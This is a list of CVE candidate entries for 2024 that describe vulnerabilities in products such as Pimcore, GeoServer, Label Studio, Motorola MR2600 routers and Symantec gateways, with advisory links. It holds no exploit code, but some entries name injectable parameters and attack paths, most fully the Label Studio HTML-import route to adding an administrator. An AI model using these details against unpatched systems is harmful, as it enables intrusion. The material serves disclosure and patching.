CVE 2024 23646 Candidate Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue. MISC:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006 | URL:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087 | URL:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8 | URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2 | URL:https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv | URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv Assigned (20240119)
CVE 2024 23645 Candidate GLPI is a Free Asset and IT Management Software package. A malicious URL can be used to execute XSS on reports pages. Upgrade to 10.0.12. MISC:https://github.com/glpi-project/glpi/commit/6cf265936c4f6edf7dea7c78b12e46d75b94d9b0 | URL:https://github.com/glpi-project/glpi/commit/6cf265936c4f6edf7dea7c78b12e46d75b94d9b0 | MISC:https://github.com/glpi-project/glpi/commit/fc1f6da9d158933b870ff374ed3a50ae98dcef4a | URL:https://github.com/glpi-project/glpi/commit/fc1f6da9d158933b870ff374ed3a50ae98dcef4a | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.12 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.12 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-2gj5-qpff-ff3x | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-2gj5-qpff-ff3x Assigned (20240119)
CVE 2024 23644 Candidate Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.) In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. MISC:https://github.com/trillium-rs/trillium/commit/16a42b3f8378a3fa4e61ece3e3e37e6a530df51d | URL:https://github.com/trillium-rs/trillium/commit/16a42b3f8378a3fa4e61ece3e3e37e6a530df51d | MISC:https://github.com/trillium-rs/trillium/commit/8d468f85e27b8d0943d6f43ce9f8c7397141a999 | URL:https://github.com/trillium-rs/trillium/commit/8d468f85e27b8d0943d6f43ce9f8c7397141a999 | MISC:https://github.com/trillium-rs/trillium/security/advisories/GHSA-9f9p-cp3c-72jf | URL:https://github.com/trillium-rs/trillium/security/advisories/GHSA-9f9p-cp3c-72jf Assigned (20240119)
CVE 2024 23643 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.2 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator’s browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default and granting non-administrators access to this endpoint is not recommended. Versions 2.23.2 and 2.24.1 contain a fix for this issue. MISC:https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0 | URL:https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0 | MISC:https://github.com/GeoWebCache/geowebcache/issues/1172 | URL:https://github.com/GeoWebCache/geowebcache/issues/1172 | MISC:https://github.com/GeoWebCache/geowebcache/pull/1174 | URL:https://github.com/GeoWebCache/geowebcache/pull/1174 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7 | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7 Assigned (20240119)
CVE 2024 23642 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap SVG Output Format when the Simple SVG renderer is enabled. Access to the WMS SVG Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a fix for this issue. MISC:https://github.com/geoserver/geoserver/commit/1b1835afbb9c282d1840786259aeda81c1d22b00 | URL:https://github.com/geoserver/geoserver/commit/1b1835afbb9c282d1840786259aeda81c1d22b00 | MISC:https://github.com/geoserver/geoserver/commit/9f40265febb5939f23e2c53930c9c35e93970afe | URL:https://github.com/geoserver/geoserver/commit/9f40265febb5939f23e2c53930c9c35e93970afe | MISC:https://github.com/geoserver/geoserver/pull/7173 | URL:https://github.com/geoserver/geoserver/pull/7173 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-fg9v-56hw-g525 | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-fg9v-56hw-g525 | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11152 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11152 Assigned (20240119)
CVE 2024 23641 Candidate SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body eg `{}` to a built and previewed/hosted sveltekit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue. MISC:https://github.com/sveltejs/kit/commit/af34142631c876a7eb62ff81f71e8a3f90dafee9 | URL:https://github.com/sveltejs/kit/commit/af34142631c876a7eb62ff81f71e8a3f90dafee9 | MISC:https://github.com/sveltejs/kit/security/advisories/GHSA-g5m6-hxpp-fc49 | URL:https://github.com/sveltejs/kit/security/advisories/GHSA-g5m6-hxpp-fc49 Assigned (20240119)
CVE 2024 23640 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.3 and 2.24.0 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources or in a specially crafted datastore file that will execute in the context of another user's browser when viewed in the Style Publisher. Access to the Style Publisher is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.3 and 2.24.0 contain a fix for this issue. MISC:https://github.com/geoserver/geoserver/pull/7162 | URL:https://github.com/geoserver/geoserver/pull/7162 | MISC:https://github.com/geoserver/geoserver/pull/7181 | URL:https://github.com/geoserver/geoserver/pull/7181 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-9rfr-pf2x-g4xf | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-9rfr-pf2x-g4xf | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11149 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11149 | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11155 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11155 Assigned (20240119)
CVE 2024 2364 Candidate A vulnerability classified as problematic has been found in Musicshelf 1.0/1.1 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256320. MISC:VDB-256320 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256320 | MISC:VDB-256320 | Musicshelf Backup androidmanifest.xml backup | URL:https://vuldb.com/?id.256320 | MISC:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Musicshelf_Manifest_issue.md | URL:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Musicshelf_Manifest_issue.md Assigned (20240310)
CVE 2024 23639 Candidate Micronaut Framework is a modern, JVM-based, full stack Java framework designed for building modular, easily testable JVM applications with support for Java, Kotlin and the Groovy language. Enabled but unsecured management endpoints are susceptible to drive-by localhost attacks. While not typical of a production application, these attacks may have more impact on a development environment where such endpoints may be flipped on without much thought. A malicious/compromised website can make HTTP requests to `localhost`. Normally, such requests would trigger a CORS preflight check which would prevent the request; however, some requests are "simple" and do not require a preflight check. These endpoints, if enabled and not secured, are vulnerable to being triggered. Production environments typically disable unused endpoints and secure/restrict access to needed endpoints. A more likely victim is the developer in their local development host, who has enabled endpoints without security for the sake of easing development. This issue has been addressed in version 3.8.3. Users are advised to upgrade. MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests | URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests | MISC:https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-583g-g682-crxf | URL:https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-583g-g682-crxf Assigned (20240119)
CVE 2024 23638 Candidate Squid is a caching proxy for the Web. Due to an expired pointer reference bug, Squid prior to version 6.6 is vulnerable to a Denial of Service attack against Cache Manager error responses. This problem allows a trusted client to perform Denial of Service when generating error pages for Client Manager reports. Squid older than 5.0.5 have not been tested and should be assumed to be vulnerable. All Squid-5.x up to and including 5.9 are vulnerable. All Squid-6.x up to and including 6.5 are vulnerable. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. As a workaround, prevent access to Cache Manager using Squid's main access control: `http_access deny manager`. CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0010/ | MISC:http://www.squid-cache.org/Versions/v5/SQUID-2023_11.patch | URL:http://www.squid-cache.org/Versions/v5/SQUID-2023_11.patch | MISC:http://www.squid-cache.org/Versions/v6/SQUID-2023_11.patch | URL:http://www.squid-cache.org/Versions/v6/SQUID-2023_11.patch | MISC:https://github.com/squid-cache/squid/commit/290ae202883ac28a48867079c2fb34c40efd382b | URL:https://github.com/squid-cache/squid/commit/290ae202883ac28a48867079c2fb34c40efd382b | MISC:https://github.com/squid-cache/squid/commit/e8118a7381213f5cfcdeb4cec1d2d854bfd261c8 | URL:https://github.com/squid-cache/squid/commit/e8118a7381213f5cfcdeb4cec1d2d854bfd261c8 | MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-j49p-553x-48rx | URL:https://github.com/squid-cache/squid/security/advisories/GHSA-j49p-553x-48rx | MISC:https://megamansec.github.io/Squid-Security-Audit/stream-assert.html | URL:https://megamansec.github.io/Squid-Security-Audit/stream-assert.html Assigned (20240119)
CVE 2024 23637 Candidate OctoPrint is a web interface for 3D printer.s OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password. An attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance. The vulnerability will be patched in version 1.10.0. MISC:https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125 | URL:https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125 | MISC:https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1 | URL:https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1 | MISC:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr | URL:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr Assigned (20240119)
CVE 2024 23636 Candidate SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue. MISC:https://github.com/sofastack/sofa-rpc/commit/42d19b1b1d14a25aafd9ef7c219c04a19f90fc76 | URL:https://github.com/sofastack/sofa-rpc/commit/42d19b1b1d14a25aafd9ef7c219c04a19f90fc76 | MISC:https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-7q8p-9953-pxvr | URL:https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-7q8p-9953-pxvr Assigned (20240119)
CVE 2024 23635 Candidate AntiSamy is a library for performing fast, configurable cleansing of HTML coming from untrusted sources. Prior to 1.7.5, there is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output. Patched in AntiSamy 1.7.5 and later. MISC:https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq | URL:https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq Assigned (20240119)
CVE 2024 23634 Candidate GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. An arbitrary file renaming vulnerability exists in versions prior to 2.23.5 and 2.24.2 that enables an authenticated administrator with permissions to modify stores through the REST Coverage Store or Data Store API to rename arbitrary files and directories with a name that does not end in `.zip`. Store file uploads rename zip files to have a `.zip` extension if it doesn't already have one before unzipping the file. This is fine for file and url upload methods where the files will be in a specific subdirectory of the data directory but, when using the external upload method, this allows arbitrary files and directories to be renamed. Renaming GeoServer files will most likely result in a denial of service, either completely preventing GeoServer from running or effectively deleting specific resources (such as a workspace, layer or style). In some cases, renaming GeoServer files could revert to the default settings for that file which could be relatively harmless like removing contact information or have more serious consequences like allowing users to make OGC requests that the customized settings would have prevented them from making. The impact of renaming non-GeoServer files depends on the specific environment although some sort of denial of service is a likely outcome. Versions 2.23.5 and 2.24.2 contain a fix for this issue. MISC:https://github.com/geoserver/geoserver/commit/5d6af2f8ba9ad7dffae59575504a867159698772 | URL:https://github.com/geoserver/geoserver/commit/5d6af2f8ba9ad7dffae59575504a867159698772 | MISC:https://github.com/geoserver/geoserver/commit/c37f58fbacdfa0d581a6f99195585f70b1201f0a | URL:https://github.com/geoserver/geoserver/commit/c37f58fbacdfa0d581a6f99195585f70b1201f0a | MISC:https://github.com/geoserver/geoserver/pull/7289 | URL:https://github.com/geoserver/geoserver/pull/7289 | MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-75m5-hh4r-q9gx | URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-75m5-hh4r-q9gx | MISC:https://osgeo-org.atlassian.net/browse/GEOS-11213 | URL:https://osgeo-org.atlassian.net/browse/GEOS-11213 Assigned (20240119)
CVE 2024 23633 Candidate Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded. MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox | URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox | MISC:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62 | URL:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62 | MISC:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146 | URL:https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146 | MISC:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r | URL:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r Assigned (20240119)
CVE 2024 23630 Candidate An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed. MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-arbitrary-firmware-upload-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-arbitrary-firmware-upload-vulnerability/ Assigned (20240118)
CVE 2024 2363 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in AOL AIM Triton 1.0.4. It has been declared as problematic. This vulnerability affects unknown code of the component Invite Handler. The manipulation of the argument CSeq leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256318 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. MISC:VDB-256318 | AOL AIM Triton Invite denial of service | URL:https://vuldb.com/?id.256318 | MISC:VDB-256318 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256318 | MISC:https://fitoxs.com/vuldb/exploit/exploit_aim_triton.txt | URL:https://fitoxs.com/vuldb/exploit/exploit_aim_triton.txt Assigned (20240310)
CVE 2024 23629 Candidate An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information. MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-authentication-bypass-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-authentication-bypass-vulnerability/ Assigned (20240118)
CVE 2024 23628 Candidate A command injection vulnerability exists in the 'SaveStaticRouteIPv6Params' parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv6params-command-injection-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv6params-command-injection-vulnerability/ Assigned (20240118)
CVE 2024 23627 Candidate A command injection vulnerability exists in the 'SaveStaticRouteIPv4Params' parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv4params-command-injection-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savestaticrouteipv4params-command-injection-vulnerability/ Assigned (20240118)
CVE 2024 23626 Candidate A command injection vulnerability exists in the ‘SaveSysLogParams’ parameter of the Motorola MR2600. A remote attacker can exploit this vulnerability to achieve command execution. Authentication is required, however can be bypassed. MISC:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savesyslogparams-command-injection-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/motorola-mr2600-savesyslogparams-command-injection-vulnerability/ Assigned (20240118)
CVE 2024 23625 Candidate A command injection vulnerability exists in D-Link DAP-1650 devices when handling UPnP SUBSCRIBE messages. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. MISC:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-subscribe-callback-command-injection-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-subscribe-callback-command-injection-vulnerability/ Assigned (20240118)
CVE 2024 23624 Candidate A command injection vulnerability exists in the gena.cgi module of D-Link DAP-1650 devices. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. MISC:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-gena-cgi-subscribe-command-injection-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/d-link-dap-1650-gena-cgi-subscribe-command-injection-vulnerability/ Assigned (20240118)
CVE 2024 23622 Candidate A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges. MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-copysls_request3-buffer-overflow/ | URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-copysls_request3-buffer-overflow/ Assigned (20240118)
CVE 2024 23621 Candidate A buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution. MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-buffer-overflow/ | URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-license-server-buffer-overflow/ Assigned (20240118)
CVE 2024 23620 Candidate An improper privilege management vulnerability exists in IBM Merge Healthcare eFilm Workstation. A local, authenticated attacker can exploit this vulnerability to escalate privileges to SYSTEM. MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-system-privilege-escalation/ | URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-system-privilege-escalation/ Assigned (20240118)
CVE 2024 23619 Candidate A hardcoded credential vulnerability exists in IBM Merge Healthcare eFilm Workstation. A remote, unauthenticated attacker can exploit this vulnerability to achieve information disclosure or remote code execution. MISC:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-information-disclosure/ | URL:https://blog.exodusintel.com/2024/01/25/ibm-merge-healthcare-efilm-workstation-information-disclosure/ Assigned (20240118)
CVE 2024 23618 Candidate An arbitrary code execution vulnerability exists in Arris SURFboard SGB6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root. MISC:https://blog.exodusintel.com/2024/01/25/arris-surfboard-sbg6950ac2-arbitrary-command-execution-vulnerability/ | URL:https://blog.exodusintel.com/2024/01/25/arris-surfboard-sbg6950ac2-arbitrary-command-execution-vulnerability/ Assigned (20240118)
CVE 2024 23617 Candidate A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution. MISC:https://blog.exodusintel.com/2024/01/25/symantec-data-loss-prevention-wp6sr-dll-stack-buffer-overflow-remote-code-execution/ | URL:https://blog.exodusintel.com/2024/01/25/symantec-data-loss-prevention-wp6sr-dll-stack-buffer-overflow-remote-code-execution/ Assigned (20240118)
CVE 2024 23616 Candidate A buffer overflow vulnerability exists in Symantec Server Management Suite version 7.9 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. MISC:https://blog.exodusintel.com/2024/01/25/symantec-server-management-suite-axengine-exe-buffer-overflow-remote-code-execution/ | URL:https://blog.exodusintel.com/2024/01/25/symantec-server-management-suite-axengine-exe-buffer-overflow-remote-code-execution/ Assigned (20240118)
CVE 2024 23615 Candidate A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 10.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. MISC:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-libdec2lha-so-stack-buffer-overflow-remote-code-execution/ | URL:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-libdec2lha-so-stack-buffer-overflow-remote-code-execution/ Assigned (20240118)
CVE 2024 23614 Candidate A buffer overflow vulnerability exists in Symantec Messaging Gateway versions 9.5 and before. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as root. MISC:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-stack-buffer-overflow-remote-code-execution/ | URL:https://blog.exodusintel.com/2024/01/25/symantec-messaging-gateway-stack-buffer-overflow-remote-code-execution/ Assigned (20240118)
CVE 2024 23613 Candidate A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM. MISC:https://blog.exodusintel.com/2024/01/25/symantec-deployment-solution-axengine-exe-buffer-overflow-remote-code-execution | URL:https://blog.exodusintel.com/2024/01/25/symantec-deployment-solution-axengine-exe-buffer-overflow-remote-code-execution Assigned (20240118)
CVE 2024 23612 Candidate An improper error handling vulnerability in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions. MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/improper-error-handling-issues-in-labview.html | URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/improper-error-handling-issues-in-labview.html Assigned (20240118)
CVE 2024 23611 Candidate An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions. MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-write-due-to-missing-bounds-check-in-labview.html | URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-write-due-to-missing-bounds-check-in-labview.html Assigned (20240118)
CVE 2024 23607 Candidate A directory traversal vulnerability exists in the F5OS QKView utility that allows an authenticated attacker to read files outside the QKView directory. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. MISC:https://my.f5.com/manage/s/article/K000132800 | URL:https://my.f5.com/manage/s/article/K000132800 Assigned (20240201)
CVE 2024 23606 Candidate An out-of-bounds write vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1925 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1925 Assigned (20240123)
CVE 2024 23605 Candidate A heap-based buffer overflow vulnerability exists in the GGUF library header.n_kv functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1916 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1916 Assigned (20240118)
CVE 2024 23604 Candidate Cross-site scripting vulnerability exists in FitNesse all releases, which may allow a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product and accessing a link with specially crafted multiple parameters. MISC:http://fitnesse.org/FitNesseDownload | URL:http://fitnesse.org/FitNesseDownload | MISC:https://github.com/unclebob/fitnesse | URL:https://github.com/unclebob/fitnesse | MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | MISC:https://jvn.jp/en/jp/JVN94521208/ | URL:https://jvn.jp/en/jp/JVN94521208/ Assigned (20240306)
CVE 2024 23603 Candidate An SQL injection vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000138047 | URL:https://my.f5.com/manage/s/article/K000138047 Assigned (20240201)
CVE 2024 23591 Candidate ThinkSystem SR670V2 servers manufactured from approximately June 2021 to July 2023 were left in Manufacturing Mode which could allow an attacker with privileged logical access to the host or physical access to server internals to modify or disable Intel Boot Guard firmware integrity, SPS security, and other SPS configuration setting. The server’s NIST SP 800-193-compliant Platform Firmware Resiliency (PFR) security subsystem significantly mitigates this issue. MISC:https://https://support.lenovo.com/us/en/product_security/LEN-150020 | URL:https://https://support.lenovo.com/us/en/product_security/LEN-150020 Assigned (20240118)
